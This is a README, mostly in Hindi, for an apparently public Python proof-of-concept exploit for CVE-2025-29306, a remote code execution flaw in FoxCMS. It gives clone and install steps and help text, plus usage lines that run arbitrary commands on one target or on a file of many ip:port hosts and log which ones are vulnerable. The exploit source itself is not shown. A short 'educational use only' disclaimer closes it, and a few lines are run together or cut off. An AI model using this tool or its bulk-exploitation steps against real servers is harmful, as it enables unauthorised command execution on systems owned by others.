
CVE-2025-29306 के लिए Proof-of-Concept (PoC), FoxCMS में एक Remote Code Execution कमजोरी। यह Python स्क्रिप्ट एकल या एकाधिक लक्ष्यों को स्कैन करती है, कमांड निष्पादित करती है, और कमजोर होस्ट की रिपोर्ट करती है।
CVE-2025-29306 के लिए एक Python शोषण, FoxCMS में एक दूरस्थ कोड निष्पादन भेद्यता। यह उपकरण एकल लक्ष्यों का परीक्षण या बल्क में कई होस्टों को स्कैन करने की अनुमति देता है।
git clone https://github.com/mattb709/CVE-2025-29306-PoC-FoxCMS-RCE
.git
cd CVE-2025-29306-PoC-FoxCMS-RCE
pip install -r requirements.txt
requestsbeautifulsoup4argparseआवश्यकताएँ स्थापित करें:
pip install requests beautifulsoup4
usage: foxcms_rce.py [-h] -c COMMAND (-t TARGET | -f TARGETS_FILE)
CVE-2025-29306 Exploit Checker
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Command to execute on vulnerable hosts
-t TARGET, --target TARGET
Single target in the format ip:port
-f TARGETS_FILE, --targets-file TARGETS_FILE
File containing multiple targets, one per line, in the format ip:port
python CVE-2025-29306-PoC -t 192.168.1.100:8080 -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami" > results.txt
लक्ष्य फ़ाइल में प्रति पंक्ति एक लक्ष्य होना चाहिए इस प्रारूप में:
ip:port
उदाहरण:
192.168.1.100:80
10.10.10.5:443
172.16.32.15:8080
स्क्रिप्ट प्रदान करती है:
foxcms_rce_results.txt में
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें